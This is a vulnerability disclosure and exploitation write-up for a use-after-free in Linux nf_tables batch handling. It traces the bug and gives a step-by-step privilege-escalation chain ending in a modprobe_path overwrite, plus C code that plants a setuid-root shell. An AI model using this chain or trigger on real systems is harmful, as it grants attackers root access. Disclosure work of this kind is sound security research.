# Use-After-Free in Netfilter nf_tables when processing batch requests

## Vulnerability Details

The affected code originates from the official Linux kernel from https://kernel.org/ and is part of the Netfilter nf_tables component (net/netfilter/nf_tables_api.c).

Netfilter nf_tables allows its configuration to be updated as an atomic operation. When using this feature, user-mode clients send batch requests containing a list of basic operations, and Netfilter nf_tables processes all the operations within the batch as a single transaction. While processing the batch, Netfilter nf_tables checks the configuration state updates to ensure that each successive basic operation is valid, taking into account the state updates from all the previous operations within the batch. However, the currently implemented check is insufficient.

In our specific scenario we start with a Netfilter nf_tables configuration that has an `nft_rule` with a `lookup` expression on an anonymous `nft_set`, where the anonymous `nft_set` contains some elements. Next, we send a batch request containing the following two basic operations:

1. An `NFT_MSG_DELRULE` operation to delete the `nft_rule`. Note that this also implicitly deletes the `lookup` expression and the anonymous `nft_set`.
2. An `NFT_MSG_DELSETELEM` operation to delete any of the elements of the deleted anonymous `nft_set`.

The current version of Netfilter nf_tables accepts the above batch request. It then calls nf_tables_commit_release(), which appends the released resources to `nf_tables_destroy_list`. The `nf_tables_destroy_list` is then processed by nf_tables_trans_destroy_work(), which first deallocates the resources related to the `NFT_MSG_DELRULE` operation by calling:

```
nft_commit_release()
  nf_tables_rule_destroy()
    nf_tables_expr_destroy()
      expr->ops->destroy()      (points to nft_lookup_destroy())
        nf_tables_destroy_set()
          nft_set_destroy()
            kvfree()
```

This deallocates the memory used by the `nft_set` before the `NFT_MSG_DELSETELEM` operation is processed, where a reference to the deallocated `nft_set` is accessed via nft_trans_elem_set() during the following calls:

```
nft_commit_release()
  nf_tables_set_elem_destroy()
    nft_set_elem_ext()
```

Within nft_set_elem_ext() above, the memory location of the deallocated `nft_set` is accessed to determine the location of the `nft_set_ext`:

```c
static inline struct nft_set_ext *nft_set_elem_ext(const struct nft_set *set,
						   void *elem)
{
	return elem + set->ops->elemsize;
}
```

for the operations that follow. So whenever the value of `set->ops->elemsize` gets corrupted, an unexpected memory location can be interpreted as the list of `nft_expr` to be destroyed:

```c
static void nf_tables_set_elem_destroy(const struct nft_ctx *ctx,
				       const struct nft_set *set, void *elem)
{
	struct nft_set_ext *ext = nft_set_elem_ext(set, elem);

	if (nft_set_ext_exists(ext, NFT_SET_EXT_EXPRESSIONS))
		nft_set_elem_expr_destroy(ctx, nft_set_ext_expr(ext));
```
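To make the consequence of the stale `set` pointer concrete, the following is a minimal userspace illustration of how a different `set->ops->elemsize` shifts the location that is then parsed as the `nft_set_ext` header. The structure layouts and elemsize values below are simplified assumptions for illustration, not the real kernel definitions:

```c
#include <stdio.h>

struct fake_ops { unsigned int elemsize; };
struct fake_set { const struct fake_ops *ops; };

/* Mirrors the kernel helper: the ext header is expected elemsize
 * bytes past the element pointer. */
static void *fake_set_elem_ext(const struct fake_set *set, void *elem)
{
	return (char *)elem + set->ops->elemsize;
}

int main(void)
{
	unsigned char elem[64] = { 0 };
	struct fake_ops type_a = { .elemsize = 16 };	/* assumed value */
	struct fake_ops type_b = { .elemsize = 32 };	/* assumed value */
	struct fake_set freed_set  = { .ops = &type_a };
	struct fake_set reused_set = { .ops = &type_b };

	/* The element was laid out for the original set type ... */
	printf("ext expected at elem + %td\n",
	       (char *)fake_set_elem_ext(&freed_set, elem) - (char *)elem);
	/* ... but a set of a different type reusing the freed memory
	 * shifts the view, so element data bytes are parsed as the
	 * nft_set_ext header. */
	printf("ext parsed at   elem + %td\n",
	       (char *)fake_set_elem_ext(&reused_set, elem) - (char *)elem);
	return 0;
}
```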
## Exploitation Techniques

Exploiting the above vulnerability requires winning a race against nf_tables_trans_destroy_work(), which executes from a background worker thread in the Linux kernel. This seems to complicate practical exploitation even before we consider existing mitigations, such as hardening of the kernel slab allocator, Kernel Address Space Layout Randomization (KASLR) and especially Control-Flow Integrity. However, the attached PoC proves that it is still possible to achieve reasonably reliable exploitation in practice.

In order to exploit the vulnerability we need to modify the content of the `nft_set` memory after it is deallocated under nf_tables_rule_destroy(), but before it is used under nf_tables_set_elem_destroy(). Both nf_tables_rule_destroy() and nf_tables_set_elem_destroy() are called within a single invocation of nf_tables_trans_destroy_work(), which executes from a background worker thread in the Linux kernel. Further, the deallocated memory chunk is usually available for reuse only from the same CPU core.

When racing with nf_tables_trans_destroy_work(), we improve our chances by adding a controlled delay for the background worker thread between its calls to nf_tables_rule_destroy() and nf_tables_set_elem_destroy(). For that we insert an additional operation to destroy another `nft_set` containing a large number of elements. Additionally, we keep all the other CPU cores busy, so that the background worker thread is likely to be scheduled on a specific CPU core and we can attempt to allocate a new structure from that same CPU core just after it deallocates the `nft_set` under nf_tables_rule_destroy().

Our goal is to allocate a new `nft_set` of a different type that reuses the memory location of the `nft_set` deallocated under nf_tables_rule_destroy(). The new `nft_set` type is selected to use a different value for `set->ops->elemsize`. So when the background worker thread finally calls nf_tables_set_elem_destroy() to process the `NFT_MSG_DELSETELEM` operation, it interprets its `elem` argument incorrectly, such that the corrupted `nft_set_ext *ext` points a few bytes past the correct location. This means that certain user-controlled data fields of the original `nft_set_ext` are now interpreted as headers, resulting in a type confusion.

One way to abuse this type confusion is by crafting the corrupted `nft_set_ext` headers with offset values such that nf_tables_set_elem_destroy() interprets the content of adjacent memory blocks as the list of `nft_expr` to destroy via the following calls:

```
nft_set_elem_expr_destroy()
  __nft_set_elem_expr_destroy()
    nf_tables_expr_destroy()
      expr->ops->destroy()
```

At this point of the exploitation, we do not yet have details of the kernel memory layout, so it is not possible to craft absolute pointer addresses. However, when crafting the corrupted `nft_set_ext` headers we can still use out-of-range offsets, such that `expr->ops->destroy()` is called on a valid `nft_expr` in an adjacent memory chunk. For this we spray `nft_log` expressions with a controlled NFTA_LOG_PREFIX. The `nft_log->prefix` is then deallocated by nft_log_destroy() once `expr->ops->destroy()` is called:

```c
static void nft_log_destroy(const struct nft_ctx *ctx,
			    const struct nft_expr *expr)
{
	struct nft_log *priv = nft_expr_priv(expr);
	struct nf_loginfo *li = &priv->loginfo;

	if (priv->prefix != nft_log_null_prefix)
		kfree(priv->prefix);
```

Note that we can still access, and even deallocate again, this memory via the other reference from the sprayed `nft_log` expression. Additionally, we can control the size of `nft_log->prefix`, such that it can be allocated from any of the slabs kmalloc-{8, ..., 192}. Finally, the referenced memory is interpreted by the kernel as a string of characters, so we do not need to worry about corruption when we overlay different objects over it. This is essentially game over. One inconvenience is that any NULL character terminates `nft_log->prefix`, so we cannot read past NULL bytes when leaking memory content.
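As a rough guide to the claim about slab sizes, here is a small userspace sketch mapping a chosen NFTA_LOG_PREFIX length onto the generic kmalloc size class it would be served from. The size-class list and the `strlen(prefix) + 1` allocation size are assumptions for illustration and depend on the kernel configuration:

```c
#include <stdio.h>
#include <stddef.h>

/* Common generic kmalloc size classes up to 192 bytes (assumed). */
static size_t kmalloc_class(size_t n)
{
	static const size_t classes[] = { 8, 16, 32, 64, 96, 128, 192 };

	for (size_t i = 0; i < sizeof(classes) / sizeof(classes[0]); i++)
		if (n <= classes[i])
			return classes[i];
	return 0;	/* larger than the slabs used in this step */
}

int main(void)
{
	/* Assuming the prefix is copied into strlen(prefix) + 1 bytes,
	 * a 90-character prefix lands in kmalloc-96 and a
	 * 130-character prefix lands in kmalloc-192. */
	printf("90 chars  -> kmalloc-%zu\n", kmalloc_class(90 + 1));
	printf("130 chars -> kmalloc-%zu\n", kmalloc_class(130 + 1));
	return 0;
}
```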
This is addressed in the next step, where we allocate `nft_object->udata` to reuse the `nft_log->prefix` memory chunk and then destroy the `nft_log` expression. This deallocates the `nft_object->udata` memory, but we can still use the `nft_object->udata` dangling pointer to leak memory content without restrictions on NULL bytes.

Looking for suitable structures for the following steps, we decided on `nft_expr` structures allocated from nft_dynset_new(). These live in the same slabs as `nft_log->prefix` and `nft_object->udata`. We also have reasonable control over the allocation size, so later we could easily switch between slabs of different sizes if needed. To use these structures, we create a packet filter with an `nft_dynset` expression. Whenever we send packets over the loopback interface, the `nft_dynset` expression calls nft_dynset_new() to create new elements for the associated `nft_set`. The created elements are stateful expressions of the following types:

* `nft_counter` to obtain the location of `nf_tables.ko` in kernel memory. The structure includes a pointer to `nft_counter_ops` in the `nf_tables.ko` kernel module. We leak this pointer by reading `nft_object->udata`.
* `nft_quota` for arbitrary memory read and write. We can repeatedly deallocate and reallocate `nft_object->udata` to modify the `nft_quota->consumed` pointer. Next, we perform an `NFT_MSG_GETSETELEM` operation, which calls nft_quota_do_dump() to read the content of the referenced memory and return it as the `NFTA_QUOTA_CONSUMED` attribute in the result.

For writes, we simply send packets over the loopback interface, where nft_quota_do_eval() calls:

```c
static inline bool nft_overquota(struct nft_quota *priv,
				 const struct sk_buff *skb)
{
	return atomic64_add_return(skb->len, priv->consumed) >=
```

to add `skb->len` to the 64-bit value referenced by `nft_quota->consumed`.

We use the above arbitrary memory read to obtain the base address of the kernel core. We then modify the "sbin" substring of the "/sbin/modprobe" pathname, replacing it with "/tmp". The resulting pathname "//tmp/modprobe" is then used by the kernel to start a process with root privileges, where we control the file content (a generic trigger for this last step is sketched at the end of this write-up).

Note that we did not put any intentional effort into bypassing Control-Flow Integrity. However, for each of the exploitation steps we consciously picked the most flexible and the most robust primitives. It turns out that our selection avoided all of the primitives that could potentially be blocked by Control-Flow Integrity. We are now curious to confirm with testing that the resulting exploit really works against systems with Control-Flow Integrity mitigations.
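Referring back to the modprobe_path step above: the following is a generic userspace sketch of how the hijacked "//tmp/modprobe" helper could be triggered. It is an assumption about this last stage rather than code from the attached PoC, and the file names /tmp/trigger and /tmp/rootsh are hypothetical:

```c
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

int main(void)
{
	/* Payload that the kernel's usermode helper runs as root once
	 * modprobe_path has been redirected to "//tmp/modprobe". */
	int fd = open("/tmp/modprobe", O_CREAT | O_WRONLY | O_TRUNC, 0755);
	dprintf(fd, "#!/bin/sh\ncp /bin/sh /tmp/rootsh && chmod 4755 /tmp/rootsh\n");
	close(fd);

	/* A file whose first bytes are non-printable and match no
	 * registered binfmt handler: executing it makes the kernel
	 * call request_module(), i.e. the path in modprobe_path. */
	fd = open("/tmp/trigger", O_CREAT | O_WRONLY | O_TRUNC, 0755);
	write(fd, "\xff\xff\xff\xff", 4);
	close(fd);

	char *argv[] = { "/tmp/trigger", NULL };
	execve("/tmp/trigger", argv, NULL); /* fails, but the helper has run */
	return 0;
}
```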